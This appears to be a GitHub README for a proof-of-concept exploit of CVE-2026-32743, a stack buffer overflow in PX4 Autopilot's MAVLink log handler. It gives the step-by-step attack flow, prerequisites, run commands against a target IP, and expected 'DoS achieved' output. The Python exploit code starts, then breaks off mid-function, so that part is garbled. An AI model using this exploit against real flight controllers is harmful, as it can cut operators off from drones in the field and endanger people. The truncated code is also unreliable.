Share
## https://sploitus.com/exploit?id=995BBC30-CEE5-5D4C-AAAC-4B6A991BB7CF
# CVE-2026-32743 - PX4 Autopilot MavlinkLogHandler Stack Buffer Overflow (DoS)
[](https://vulners.com/cve/CVE-2026-32743)
[-orange)](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
[-blue)](https://cwe.mitre.org/data/definitions/121.html)
[](https://px4.io/)
[](#)
[](LICENSE)
[](https://python.org)
[](https://github.com/mbanyamer)
[](https://instagram.com/banyamer_security)
[](https://twitter.com/banyamer_sec)
---
## π Description
**CVE-2026-32743** is a **stackβbased buffer overflow** in the `MavlinkLogHandler` of PX4 Autopilot versions **β€1.17.0-rc2**.
The `LogEntry.filepath` buffer is only **60 bytes**, but `sscanf()` parses log directory paths **without a width specifier**.
An attacker with **MAVLink link access** can:
1. Use **MAVLink FTP** to create a deeply nested directory (path length > 60 bytes) inside `/fs/microsd/log/`.
2. Request the log list via `MAV_CMD_REQUEST_LOG_LIST`.
3. The vulnerable `MavlinkLogHandler` copies the long path into the 60βbyte buffer β **stack overflow**.
4. The MAVLink task crashes β **loss of telemetry and command capability** β **persistent Denial of Service** (until reboot).
**Fixed in**: [commit 616b25a](https://github.com/PX4/PX4-Autopilot/commit/616b25a280e229c24d5cf12a03dbf248df89c474) (added width specifier to `sscanf`).
---
## π₯ Attack Flow Diagram
```mermaid
sequenceDiagram
participant Attacker
participant PX4 as PX4 Flight Controller
participant SD as SD Card (/fs/microsd/log/)
Attacker->>PX4: 1. Open MAVLink connection (UDP 14550)
PX4-->>Attacker: Heartbeat (system/component IDs)
Note over Attacker,PX4: Step 2: Create long directory via MAVLink FTP
Attacker->>PX4: MAVLink FTP: OpenFile( path = "/fs/microsd/log/" + "A"*70, flags=O_CREAT|O_DIRECTORY )
PX4->>SD: Create directory (named 70Γ'A')
SD-->>PX4: OK
Note over Attacker,PX4: Step 3: Trigger overflow by requesting log list
Attacker->>PX4: MAV_CMD_REQUEST_LOG_LIST (command 261)
PX4->>PX4: MavlinkLogHandler::list() reads log directory
PX4->>PX4: sscanf(path, "%s", LogEntry.filepath) β NO width limit!
Note right of PX4: Buffer overflow: 70 bytes written into 60-byte buffer
PX4--xAttacker: MAVLink task crashes β no more heartbeats/commands
Note over Attacker,PX4: β
DoS achieved β flight controller unmanageable
```
---
## βοΈ Prerequisites
- **Target running PX4** β€ `1.17.0-rc2` with **SD card** mounted (logs stored in `/fs/microsd/log/`).
- **MAVLink FTP enabled** (default on most PX4 builds).
- **Network access** to the flight controllerβs MAVLink UDP port (default `14550`).
- **Python 3.6+** with `pymavlink` installed:
```bash
pip install pymavlink
```
---
## π Usage
```bash
git clone https://github.com/mbanyamer/CVE-2026-32743-PoC
cd CVE-2026-32743-PoC
python3 exploit.py [--port ]
```
| Argument | Description | Default |
|--------------|--------------------------------------|-----------|
| `target_ip` | IP address of the flight controller | *required*|
| `--port` | MAVLink UDP port | `14550` |
### Example
```bash
python3 exploit.py 192.168.1.10 --port 14550
```
**Expected output** (successful DoS):
```
[*] Connecting to MAVLink target: 192.168.1.10:14550
[+] Heartbeat received from system 1, component 1
[*] Creating long directory: /fs/microsd/log/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (length 80 bytes)
[+] Directory created (or already existed).
[*] Requesting log list via MAV_CMD_REQUEST_LOG_LIST...
[*] Waiting for crash (target will stop responding)...
[+] Target unresponsive β DoS achieved!
```
---
## π PoC Code
```python
#!/usr/bin/env python3
# Exploit Title: PX4 Autopilot MavlinkLogHandler Stack Buffer Overflow (DoS)
# CVE: CVE-2026-32743
# Date: 2026-05-08
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://px4.io/
# Software Link: https://github.com/PX4/PX4-Autopilot
# Affected: Versions 1.17.0-rc2 and below
# Tested on: PX4 v1.17.0-rc2 (Pixhawk)
# Category: DoS
# Platform: Embedded (PX4 Autopilot)
# Exploit Type: Stack-based Buffer Overflow
# CVSS: 7.5 (High)
# CWE: CWE-121
# Description: Creates an overly long directory via MAVLink FTP, then requests log list.
# Fixed in: https://github.com/PX4/PX4-Autopilot/commit/616b25a
# Usage: python3 exploit.py [--port ]
print(r"""
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β
β βββββββ ββββββ ββββ ββββββ βββ ββββββ ββββ βββββββββββββββββββ β
β βββββββββββββββββββββ βββββββ βββββββββββββββββ βββββββββββββββββββββ β
β ββββββββββββββββββββββ βββ βββββββ βββββββββββββββββββββββββ ββββββββ β
β ββββββββββββββββββββββββββ βββββ βββββββββββββββββββββββββ ββββββββ β
β βββββββββββ ββββββ ββββββ βββ βββ ββββββ βββ ββββββββββββββ βββ β
β βββββββ βββ ββββββ βββββ βββ βββ ββββββ ββββββββββββββ βββ β
β β
β [ b a n y a m e r _ s e c u r i t y ] β
β β
β βΈ Silent Hunter | Shadow Presence | Digital Intel β β
β β
β Operator : Mohammed Idrees Banyamer β’ Jordan π―π΄ β
β Handle : @banyamer_security β
β β
β Exploit : CVE-2026-32743 β
β Target : PX4 Autopilot β’ MAVLink β’ Log Handler β
β β
β Status : ACTIVE β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
""")
import time
import struct
import argparse
from pymavlink import mavutil
from pymavlink.dialects.v20 import common as mavlink2
def send_ftp_command(mav, seq, payload):
msg = mav.file_transfer_protocol_encode(
target_system=mav.target_system,
target_component=mav.target_component,
payload=payload
)
mav.mav.send(msg)
def ftp_create_directory(mav, path):
O_CREAT = 0x04
O_DIRECTORY = 0x08
seq = 1
path_bytes = path.encode('utf-8') + b'\x00'
payload = struct.pack(' *"Silent Hunter | Shadow Presence | Digital Intel"*
---
## β οΈ Disclaimer
This proof of concept (PoC) is intended **solely for educational and defensive purposes**.
Unauthorized use against systems you do not own or have explicit permission to test is **illegal**.
The author assumes **no liability** for any misuse or damage caused by this software.
---
## π License
This project is licensed under the **MIT License** β see the [LICENSE](LICENSE) file for details.
Feel free to use, modify, and distribute with attribution.
---
## β Star this repo if you found it useful!
[](https://github.com/mbanyamer/CVE-2026-32743-PoC/stargazers)